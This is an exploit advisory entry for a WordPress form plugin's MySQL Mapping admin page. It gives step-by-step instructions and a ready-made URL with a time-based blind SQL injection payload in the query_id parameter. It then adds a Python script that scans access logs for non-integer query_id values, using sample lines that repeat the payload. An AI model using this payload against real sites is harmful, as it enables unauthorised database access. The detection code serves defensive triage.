## https://sploitus.com/exploit?id=WPEX-ID:DDC9ED69-D942-4FAD-BBF4-1BE3B86460D9
Create or edit a form, then go to Settings > MySQL Mapping (i.e. /admin.php?page=manage_fm&task=edit&current_id=1&tab=4&fieldset_id=mapping). Copy the link used to delete a query (create a query first if there is none) and put the following payload in the query_id parameter: 1%20AND%20(SELECT%209312%20FROM%20(SELECT(SLEEP(5)))hYkP)

e.g.: https://example.com/wp-admin/admin.php?page=manage_fm&nonce_fm=27d813d111&task=remove_query&current_id=1&query_id=1%20AND%20(SELECT%209312%20FROM%20(SELECT(SLEEP(5)))hYkP)&fieldset_id=mapping
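
For triage on the defensive side, the following added example (not part of the original advisory or the plugin's code) scans web-server access logs for `remove_query` requests to `manage_fm` whose `query_id` is not a plain integer. The log lines are constructed samples, and the assumption that a legitimate `query_id` is a numeric row id is inferred from the URL above; `check_line` and `scan` are hypothetical helper names.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format), not real traffic.
BASE = "/wp-admin/admin.php?page=manage_fm&nonce_fm=27d813d111"
SAMPLE_LOG = [
    f'203.0.113.7 - - [10/Jan/2024:10:00:01 +0000] "GET {BASE}&task=remove_query'
    '&current_id=1&query_id=3&fieldset_id=mapping HTTP/1.1" 200 5120',
    f'203.0.113.7 - - [10/Jan/2024:10:00:09 +0000] "GET {BASE}&task=remove_query'
    '&current_id=1&query_id=1%20AND%20(SELECT%209312%20FROM%20(SELECT(SLEEP(5)))hYkP)'
    '&fieldset_id=mapping HTTP/1.1" 200 5120',
    f'198.51.100.4 - - [10/Jan/2024:10:01:00 +0000] "GET {BASE}&task=edit'
    '&current_id=1&tab=4&fieldset_id=mapping HTTP/1.1" 200 9000',
]

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')
SQL_HINT_RE = re.compile(r"\b(select|sleep|benchmark|union|and|or)\b", re.I)


def check_line(line):
    """Return a finding dict if the line is a manage_fm remove_query request
    whose query_id is not a plain decimal integer, otherwise None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    client, target = m.groups()
    url = urlsplit(target)
    params = parse_qs(url.query, keep_blank_values=True)  # also URL-decodes
    if not url.path.endswith("/admin.php"):
        return None
    if params.get("page") != ["manage_fm"] or params.get("task") != ["remove_query"]:
        return None
    # Assumption: a legitimate query_id is a numeric row id, as in the page's URL.
    bad = [v for v in params.get("query_id", []) if not re.fullmatch(r"[0-9]+", v)]
    if not bad:
        return None
    return {"client": client, "query_id": bad[0],
            "sql_keywords": bool(SQL_HINT_RE.search(bad[0]))}


def scan(lines):
    """Collect findings for every suspicious line in an iterable of log lines."""
    return [f for f in map(check_line, lines) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The integer check is the primary signal; the keyword flag only helps prioritise findings and should not be relied on alone.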